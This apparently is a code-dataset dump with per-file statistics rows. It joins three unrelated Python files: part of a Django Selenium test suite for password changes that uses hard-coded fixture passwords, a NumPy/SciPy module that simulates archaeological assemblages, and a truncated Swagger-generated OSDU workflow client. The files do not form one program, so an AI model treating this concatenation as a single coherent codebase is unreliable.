new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("tbf:[D=5")
new_password2.send_keys("kOx`Y{nM")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Les deux mots de passe ne correspondent pas."
in self.driver.page_source
)
def test_invalid_live_change_password_with_wrong_old_password(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9123")
new_password1.send_keys("kOx`Y{nM")
new_password2.send_keys("kOx`Y{nM")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Votre ancien mot de passe est incorrect. "
"Veuillez le rectifier."
) in self.driver.page_source
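# Illustrative invocation sketch (assumed tooling; not part of the test module):
# these LiveServerTestCase suites are typically run through pytest-django, e.g.
#   pytest mutadi/members/tests/test_chrome.py --ds=<your settings module>
# and require a chromedriver binary matching the installed Chrome on PATH.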
| 41.493036 | 91 | 0.651114 | 1,957 | 14,896 | 4.743996 | 0.100664 | 0.138949 | 0.078414 | 0.117622 | 0.839832 | 0.821952 | 0.801056 | 0.790392 | 0.77165 | 0.767019 | 0 | 0.015573 | 0.219723 | 14,896 | 358 | 92 | 41.608939 | 0.783016 | 0.048805 | 0 | 0.746575 | 0 | 0 | 0.151049 | 0.014602 | 0 | 0 | 0 | 0 | 0.061644 | 1 | 0.047945 | false | 0.280822 | 0.034247 | 0 | 0.10274 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e4954c4e5393dd1b7f021adc455d5c9d168156a6 | 7,587 | py | Python | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | """Generate simulated assemblages and compare simulation vs. observed artifacts.
Author: Andrew Cabaniss
"""
import numpy as np
import scipy.spatial  # a bare "import scipy" does not expose scipy.spatial.distance_matrix used below
import matplotlib.pyplot as plt
import random as rd
def simulate_assemblages_collection(context_counts, N = 10000, p_dist = 2, center = 'observed'):
"""Calculate a theoretical object-assemblage matrix with similar marginal probabilities for an entire site.
Parameters
----------
context_counts :pandas.DataFrame
Rows need to be the contexts, columns need to be integer counts of objects
N : int
number of theoretical assemblages to generate
p_dist : int
Dimensions for the Minkowski distance: 1 for Manhattan/taxi-cab, 2 for Euclidian
center : {'observed', 'calculated'}
If observed: the mean of all simulated distributions is used
If calculated: the expected mean is used instead.
Returns
-------
results : dict
The results dict stores different data from the simulation:
1. raw_simulation - the numpy.array of the simulated assemblages
2. raw_observed - the formatted observed data as a numpy.array
3. distance_simulation - the distances from the center of the simulated distribution
4. distance_observed - the distance of our actual assemblage from the center of the simulated distribution
5. p-value - the proportion of simulated assemblages further from the center than the observed assemblages
6. N - number of assemblages generated
7. p_dist - dimensionality of the distance used
8. center - the center chosen for distances to be calculated from
"""
# Value checks
if center not in ['observed', 'calculated']:
raise ValueError("center neither 'observed' nor 'calculated")
#First, the observed data are formatted and used to construct the parameters for a weighted random distribution
observed = np.asanyarray(context_counts) #convert from DataFrame to ndarray
num_objects = observed.sum().sum() #total number of objects across all contexts/types
num_contexts = observed.shape[0] # number of contexts
num_types = observed.shape[1] #number of different types of objects
marginal_types = observed.sum(axis = 0)*1./num_objects #marginal distribution of the types of objects
marginal_contexts = observed.sum(axis = 1)*1./num_objects #marginal distribution of the contexts
#generate simulated assemblages
collector = np.zeros((N,num_contexts,num_types))
for i in range(N):
for o in range(num_objects):
x = rd.choices(range(num_contexts), weights=marginal_contexts)[0]  # rd.choices returns a list; take the single draw
y = rd.choices(range(num_types), weights=marginal_types)[0]
collector[i, x, y] += 1
#Determine the center to be used for measuring all distances
if center == 'calculated':
center_calc = np.outer(marginal_contexts, marginal_types)*num_objects #calculate the theoretical center of the distribution
elif center == 'observed':
center_calc = collector.mean(axis = 0) #calculate the actual center of the distribution
#prepare the distribution, observed data, and center of the distribution for distance calculation
center_calc_flat = center_calc.reshape(1,-1) #reshape to be flat for distances
collector_flat = np.reshape(collector,(N, -1)) #reshape to be flat for distances
data_flat = np.asanyarray(observed).reshape(1, -1) #reshape to be flat for distances
#calculate distances within the simulated distribution
dists_boot = scipy.spatial.distance_matrix(center_calc_flat, collector_flat, p = p_dist).flatten()
dist_real = scipy.spatial.distance_matrix(center_calc_flat, data_flat , p = p_dist).flatten()[0]
#return results
result = {'raw_simulation' : collector,
'raw_observed' : observed,
'distance_simulation' : dists_boot,
'distance_observed' : dist_real,
'p-value' : sum(dists_boot>=dist_real)*1./len(dists_boot),
'N' : N,
'p_dist' : p_dist,
'center' : center}
return result
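# Illustrative usage sketch (toy counts; not part of the original module). A small N
# keeps the demonstration fast; real analyses should use the default N=10000 or more.
def _demo_simulate_collection():
    toy_counts = np.array([[5, 2, 0, 1],
                           [1, 7, 3, 0],
                           [0, 2, 4, 6]])  # 3 contexts x 4 object types
    result = simulate_assemblages_collection(toy_counts, N=200)
    print('observed distance:', result['distance_observed'])
    print('p-value:', result['p-value'])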
def simulate_assemblage_single(context_counts, context_index, N = 10000, p_dist = 2, center = 'observed'):
"""Calculate a theoretical object-assemblage matrix with similar marginal probabilities for an entire site.
Parameters
----------
context_counts :pandas.DataFrame
Rows need to be the contexts, columns need to be integer counts of objects
context_index : int
which row needs to be used
N : int
number of theoretical assemblages to generate
p_dist : int
Dimensions for the Minkowski distance: 1 for Manhattan/taxi-cab, 2 for Euclidian
center : {'observed', 'calculated'}
If observed: the mean of all simulated distributions is used
If calculated: the expected mean is used instead.
Returns
-------
results : dict
The results dict stores different data from the simulation:
1. raw_simulation - the numpy.array of the simulated assemblages
2. raw_observed - the formatted observed data as a numpy.array
3. distance_simulation - the distances from the center of the simulated distribution
4. distance_observed - the distance of our actual assemblage from the center of the simulated distribution
5. p-value - the proportion of simulated assemblages further from the center than the observed assemblages
6. N - number of assemblages generated
7. p_dist - dimensionality of the distance used
8. center - which center definition used
"""
if center not in ['observed', 'calculated']:
raise ValueError("center neither 'observed' nor 'calculated")
#First, the observed data are formatted and used to construct the parameters for a weighted random distribution
observed_sites = np.asanyarray(context_counts) #convert from DataFrame or other structure to ndarray
observed = observed_sites[context_index]
num_objects = observed.sum() #objects in this context
num_types = observed_sites.shape[1] #number of different types of objects
marginal_types = observed_sites.sum(axis = 0)*1./observed_sites.sum().sum() #marginal distribution of the types of objects
#generate simulated assemblages
collector = np.zeros((N,num_types))
for i in range(N):
for o in range(num_objects):
y = rd.choices(range(num_types), weights=marginal_types)[0]  # rd.choices returns a list; take the single draw
collector[i, y] += 1
#Determine the center to be used for measuring all distances
if center == 'calculated':
center_calc = marginal_types*num_objects #calculate the theoretical center of the distribution
elif center == 'observed':
center_calc = collector.mean(axis = 0) #calculate the actual center of the distribution
#calculate distances within the simulated distribution
dists_boot = scipy.spatial.distance_matrix(center_calc.reshape(1,-1), collector, p = p_dist).flatten()
dist_real = scipy.spatial.distance_matrix(center_calc.reshape(1,-1), observed.reshape(1,-1) , p = p_dist).flatten()[0]
#return results
result = {'raw_simulation' : collector,
'raw_observed' : observed,
'distance_simulation' : dists_boot,
'distance_observed' : dist_real,
'p-value' : sum(dists_boot>=dist_real)*1./len(dists_boot),
'N' : N,
'p_dist' : p_dist,
'center' : center}
return result | 49.914474 | 131 | 0.692105 | 986 | 7,587 | 5.21501 | 0.170385 | 0.013613 | 0.016336 | 0.011669 | 0.808635 | 0.805134 | 0.805134 | 0.756321 | 0.738234 | 0.720731 | 0 | 0.010309 | 0.232898 | 7,587 | 152 | 132 | 49.914474 | 0.873196 | 0.522473 | 0 | 0.523077 | 1 | 0 | 0.099375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.061538 | 0 | 0.123077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9015408166de365722c4cdfd99b1934821ec1261 | 36,209 | py | Python | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 3 | 2021-11-05T20:52:54.000Z | 2021-11-23T23:02:29.000Z | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 4 | 2021-11-05T19:57:08.000Z | 2021-12-14T13:59:04.000Z | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 36 | 2021-08-31T20:58:25.000Z | 2022-03-30T17:02:57.000Z | # coding: utf-8
"""
self-managed-osdu
Rest API Documentation for Self Managed OSDU # noqa: E501
OpenAPI spec version: 0.11.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from OsduClient.api_client import ApiClient
class WorkflowApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Delete a workflow defintion. # noqa: E501
Delete a workflow by it's name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to be deleted. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.delete_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def delete_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Delete a workflow defintion. # noqa: E501
Delete a workflow by it's name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to be deleted. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `delete_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deploy_workflow(self, **kwargs): # noqa: E501
"""Creates workflow definition with standard orchestrator operators. # noqa: E501
API to create a new workflow using standard operators of orchestrator. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_workflow(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Workflow body: Request payload for deploying new workflow.
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deploy_workflow_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deploy_workflow_with_http_info(**kwargs) # noqa: E501
return data
def deploy_workflow_with_http_info(self, **kwargs): # noqa: E501
"""Creates workflow definition with standard orchestrator operators. # noqa: E501
API to create a new workflow using standard operators of orchestrator. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_workflow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Workflow body: Request payload for deploying new workflow.
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deploy_workflow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_workflow_runs(self, workflow_name, **kwargs): # noqa: E501
"""Get all run instances of a workflow. # noqa: E501
Get all run instances for a workflow.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_workflow_runs(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow for which the execution details has to be fetched. (required)
:param str prefix: A prefix used when generating the runId of the workflow run. Prefix cannot contain the word \"backfill\"
:param str start_date: The start date where this call should start creating workflow runs from (inclusive)
:param bool end_date: The end date where this call should stop creating workflow runs at (inclusive)
:param int limit: The maximum number of workflow runs to create in a single request. Maximum is 500.
:param str cursor: Cursor for subsequent request.
:param bool partial: Whether or not a partial batch can be created. If true, and the number of workflow runs that would be created between the start and end exceeds the limit, no workflow runs will be created.
:param str conf: JSON configuration added to the Workflow run conf attribute
:return: list[WorkflowRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_workflow_runs_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.get_all_workflow_runs_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def get_all_workflow_runs_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Get all run instances of a workflow. # noqa: E501
Get all run instances for a workflow.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_workflow_runs_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow for which the execution details has to be fetched. (required)
:param str prefix: A prefix used when generating the runId of the workflow run. Prefix cannot contain the word \"backfill\"
:param str start_date: The start date where this call should start creating workflow runs from (inclusive)
:param bool end_date: The end date where this call should stop creating workflow runs at (inclusive)
:param int limit: The maximum number of workflow runs to create in a single request. Maximum is 500.
:param str cursor: Cursor for subsequent request.
:param bool partial: Whether or not a partial batch can be created. If true, and the number of workflow runs that would be created between the start and end exceeds the limit, no workflow runs will be created.
:param str conf: JSON configuration added to the Workflow run conf attribute
:return: list[WorkflowRun]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'prefix', 'start_date', 'end_date', 'limit', 'cursor', 'partial', 'conf'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_workflow_runs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `get_all_workflow_runs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
if 'prefix' in params:
query_params.append(('prefix', params['prefix'])) # noqa: E501
if 'start_date' in params:
query_params.append(('startDate', params['start_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('endDate', params['end_date'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'cursor' in params:
query_params.append(('cursor', params['cursor'])) # noqa: E501
if 'partial' in params:
query_params.append(('partial', params['partial'])) # noqa: E501
if 'conf' in params:
query_params.append(('conf', params['conf'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WorkflowRun]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_workflow_run(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Get details for a speciffic workflow run instance. # noqa: E501
Get an execution instances for a workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_run(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the workflow. (required)
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
else:
(data) = self.get_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
return data
def get_workflow_run_with_http_info(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Get details for a speciffic workflow run instance. # noqa: E501
Get an execution instances for a workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_run_with_http_info(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the workflow. (required)
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'run_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_workflow_run" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `get_workflow_run`") # noqa: E501
# verify the required parameter 'run_id' is set
if self.api_client.client_side_validation and ('run_id' not in params or
params['run_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `run_id` when calling `get_workflow_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
if 'run_id' in params:
path_params['runId'] = params['run_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun/{runId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkflowRun', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_workflow(self, **kwargs): # noqa: E501
"""List all the workflow applicable for a tenant. # noqa: E501
List all the workflows for the tenant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_workflow(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str prefix: Filter workflow names which start with the full prefix specified.
:return: list[Workflow]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_workflow_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_all_workflow_with_http_info(**kwargs) # noqa: E501
return data
def list_all_workflow_with_http_info(self, **kwargs): # noqa: E501
"""List all the workflow applicable for a tenant. # noqa: E501
List all the workflows for the tenant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_workflow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str prefix: Filter workflow names which start with the full prefix specified.
:return: list[Workflow]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['prefix'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_workflow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'prefix' in params:
query_params.append(('prefix', params['prefix'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Workflow]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def trigger_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Trigger a workflow. # noqa: E501
Trigger a workflow mentioned in payload. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to run. (required)
:param WorkflowTriggerRequest body:
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.trigger_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.trigger_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def trigger_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Trigger a workflow. # noqa: E501
Trigger a workflow mentioned in payload. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to run. (required)
:param WorkflowTriggerRequest body:
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method trigger_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `trigger_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkflowRun', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_workflow_run(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Update the workflow run instance. # noqa: E501
Update workflow run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_workflow_run(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the workflow. (required)
:param WorkflowRun body:
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
else:
(data) = self.update_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
return data
def update_workflow_run_with_http_info(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Update the workflow run instance. # noqa: E501
Update workflow run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_workflow_run_with_http_info(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the workflow. (required)
:param WorkflowRun body:
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'run_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_workflow_run" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `update_workflow_run`") # noqa: E501
# verify the required parameter 'run_id' is set
